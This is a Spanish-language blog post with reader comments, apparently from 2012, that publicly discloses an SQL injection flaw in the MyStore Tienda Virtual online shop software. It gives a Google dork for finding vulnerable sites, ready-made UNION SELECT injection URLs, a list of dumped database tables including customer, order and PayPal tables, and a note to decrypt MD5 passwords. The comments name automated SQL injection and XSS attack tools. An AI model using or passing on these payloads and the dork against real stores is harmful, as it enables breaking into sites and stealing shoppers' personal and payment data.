El dia de ayer decidi hacer publica una vulnerabilidad en un sistema de ventas online, solo puse uno de los varios links , ya que el sistema sufre de varios sql, como xss, lo peor de esta vulnerabilidad es que revela absolutamente todos los datos de los compradores.

para explotar es lo siguiente:
======================================================================================== | # Title : SQL Injection MyStore Tienda Virtual | | # Author : Arturo Zamora | | # email : [email protected] | | # DAte : 02/01/2012 | | # Verified : yes | | # Risk : High | | # Published: | | # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ | | # Dork : inurl:art_detalle.php?id= | ====================== zeux0r 2012 ================================= Exploit : ====================== http://localhost/path/art_detalle.php?id={sqli} ====================== Example: ====================== http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- ====================== dbs: ====================== articulos articulos_nivel3 articulos_relacionados articulos_secciones atajada atajadausa ayuda ayudausa banners banners_conteo banners_lateral banners_lateralusa basket campania clientesclientes_envio clientes_facturacion colores comentario comisionistas comisionistas_hits comisionistas_modulos contacto descuentos descuentos_cruzados descuentos_temp especificacion home homeusa justin justinusa mensajeria mensajeriausa mixer newsletter newsletter_mensaje nivel1 nivel2 nivel3 parametros paypal pedidos pedidos_detalle pedidos_detalleusa pedidosusa remate remateusa secciones shopper sol_info talisman tallas ticker tickerusa visitas ====================== Information : ====================== password decrypt md5 ====================== I Love U Pumosita www.insecure.org.mx ================================ Mexican shotos ======================================== Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor * -------------------------------------------------------------------------------------------
mirror:http://www.exploit-db.com/exploits/18302/
SQL Injection MyStore Tienda Virtual
Nice disclosure Zeux0r… eso nos anima a seguirle buscando, que siempre hay errores en todo… ch33rs!
gracias por la info, se puede saber como se llama el programa que esta en el screenshot?
gracias
havij vercion pro, saludos
muchas gracias! si no es mucha molestia, igual quisiera saber si hay programas similar pero para XSS?
XCodeXploitScanner sqli xss y lfi 😉
gracias!
Que tal una pregunta como puedo pertencer al team o grupo de Mexican Shtos XDDD
saludos XD